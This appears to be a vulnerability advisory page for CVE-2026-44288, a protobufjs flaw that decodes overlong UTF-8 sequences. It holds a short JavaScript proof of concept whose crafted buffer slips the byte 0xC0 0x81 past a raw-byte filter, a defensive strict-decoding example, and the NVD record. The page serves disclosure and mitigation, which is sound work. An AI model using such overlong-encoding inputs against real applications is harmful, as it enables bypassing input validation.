Security Vulnerability Report
CVE-2026-44288 CVSS 5.3 MEDIUM

CVE-2026-44288

Published: 2026-05-13 16:16:56
Last Modified: 2026-05-13 17:01:38

Description

protobufjs compiles protobuf definitions into JavaScript (JS) functions. Prior to 7.5.6 and 8.0.2, protobufjs includes a minimal UTF-8 decoder that accepted overlong UTF-8 byte sequences and decoded them to their canonical characters instead of replacing them. An attacker who can provide protobuf binary data decoded through the affected UTF-8 path may be able to bypass application-level checks that inspect raw bytes before protobuf string decoding. For example, bytes that do not contain certain ASCII characters could decode to strings containing those characters. This vulnerability is fixed in 7.5.6 and 8.0.2.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

protobufjs < 7.5.6
protobufjs >= 8.0.0, < 8.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// Conceptual PoC for protobufjs UTF-8 Overlong Decoding
// Vulnerable versions: < 7.5.6, < 8.0.2
const protobuf = require("protobufjs");

// Define a simple message type with a string field.
// Root.fromJSON builds a reflection tree from a JSON descriptor.
const root = protobuf.Root.fromJSON({
  nested: {
    Message: {
      fields: {
        content: { type: "string", id: 1 }
      }
    }
  }
});
const Message = root.lookupType("Message");

// Normal byte for 'A' is 0x41.
// Overlong encoding for 'A' is 0xC0 0x81 (2-byte representation of a 1-byte character).
// Bypass logic: Check raw bytes for 0x41 (Block it), but allow 0xC0 0x81.
function checkRawBytes(buffer) {
  // Simulate a security check blocking 'A'
  for (let i = 0; i < buffer.length; i++) {
    if (buffer[i] === 0x41) {
      throw new Error("Security check failed: 'A' found in raw bytes.");
    }
  }
  console.log("Security check passed.");
}

// Construct malicious payload using overlong encoding
// Wire format: Tag (Field 1, Wire Type 2) + Length + Value
// Tag: 0x0A (Field 1 << 3 | 2)
// Length: 0x02
// Value: 0xC0 0x81 (Overlong 'A')
const maliciousBuffer = Buffer.from([0x0A, 0x02, 0xC0, 0x81]);

try {
  checkRawBytes(maliciousBuffer);
  // Decode using protobufjs (vulnerable version)
  const decoded = Message.decode(maliciousBuffer);
  console.log("Decoded string:", decoded.content);
  // If vulnerable, this prints "A" despite the check.
  if (decoded.content === 'A') {
    console.log("Vulnerability exploited: Overlong encoding bypassed filter.");
  }
} catch (e) {
  console.error(e.message);
}
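The mitigation side of the same issue, as an added example that is not protobufjs code or part of the advisory's PoC: a standalone shortest-form UTF-8 checker plus a strict decode path, showing that a raw-byte filter scanning for 0x41 cannot see the overlong 0xC0 0x81 form, so input must be rejected for non-shortest-form encoding (or the check must run on the decoded string). The names findIllFormedUtf8 and strictDecode and the sample byte arrays are constructed for this example.

```javascript
// Added example (not protobufjs code): reject non-shortest-form UTF-8 so an overlong
// sequence cannot pass a raw-byte filter and then decode to a character that filter blocks.

// Returns null when `bytes` is well-formed UTF-8 (Unicode Table 3-7), otherwise the offset
// and reason of the first ill-formed sequence. Overlong forms (0xC0/0xC1 leads, 0xE0 followed
// by a byte below 0xA0, 0xF0 followed by a byte below 0x90), UTF-16 surrogates and code
// points above U+10FFFF are all reported rather than silently decoded.
function findIllFormedUtf8(bytes) {
  let i = 0;
  while (i < bytes.length) {
    const b0 = bytes[i];
    if (b0 < 0x80) { i += 1; continue; }                // plain ASCII
    let need, lo = 0x80, hi = 0xbf, narrow = null;      // continuation count, range of 2nd byte
    if (b0 >= 0xc2 && b0 <= 0xdf) need = 1;
    else if (b0 === 0xe0) { need = 2; lo = 0xa0; narrow = "overlong sequence"; }
    else if (b0 === 0xed) { need = 2; hi = 0x9f; narrow = "UTF-16 surrogate"; }
    else if (b0 >= 0xe1 && b0 <= 0xef) need = 2;
    else if (b0 === 0xf0) { need = 3; lo = 0x90; narrow = "overlong sequence"; }
    else if (b0 === 0xf4) { need = 3; hi = 0x8f; narrow = "code point above U+10FFFF"; }
    else if (b0 >= 0xf1 && b0 <= 0xf3) need = 3;
    else return { offset: i, reason: (b0 === 0xc0 || b0 === 0xc1) ? "overlong sequence" : "invalid lead byte" };
    if (i + need >= bytes.length) return { offset: i, reason: "truncated sequence" };
    for (let k = 1; k <= need; k++) {
      if (bytes[i + k] < 0x80 || bytes[i + k] > 0xbf) return { offset: i, reason: "bad continuation byte" };
    }
    if (bytes[i + 1] < lo || bytes[i + 1] > hi) return { offset: i, reason: narrow };
    i += need + 1;
  }
  return null;
}

// Strict decode: Node's TextDecoder with fatal:true throws on any ill-formed input, so an
// overlong 0xC0 0x81 never becomes "A". Returns null instead of a string on failure.
function strictDecode(bytes) {
  try {
    return new TextDecoder("utf-8", { fatal: true }).decode(Uint8Array.from(bytes));
  } catch (e) {
    return null;
  }
}

// Constructed sample: the string-field value bytes from the PoC above (overlong 'A').
const overlongA = [0xc0, 0x81];
console.log("raw bytes contain 0x41:", overlongA.includes(0x41));   // false: the byte filter is blind
console.log("ill-formed at:", findIllFormedUtf8(overlongA));         // { offset: 0, reason: 'overlong sequence' }
console.log("strict decode:", strictDecode(overlongA));              // null
```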

References

https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-q6x5-8v7m-xcrf

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-44288",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-13T16:16:55.587",
    "lastModified": "2026-05-13T17:01:38.423",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "protobufjs compiles protobuf definitions into JavaScript (JS) functions. Prior to 7.5.6 and 8.0.2, protobufjs includes a minimal UTF-8 decoder that accepted overlong UTF-8 byte sequences and decoded them to their canonical characters instead of replacing them. An attacker who can provide protobuf binary data decoded through the affected UTF-8 path may be able to bypass application-level checks that inspect raw bytes before protobuf string decoding. For example, bytes that do not contain certain ASCII characters could decode to strings containing those characters. This vulnerability is fixed in 7.5.6 and 8.0.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-176" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-q6x5-8v7m-xcrf",
        "source": "[email protected]"
      }
    ]
  }
}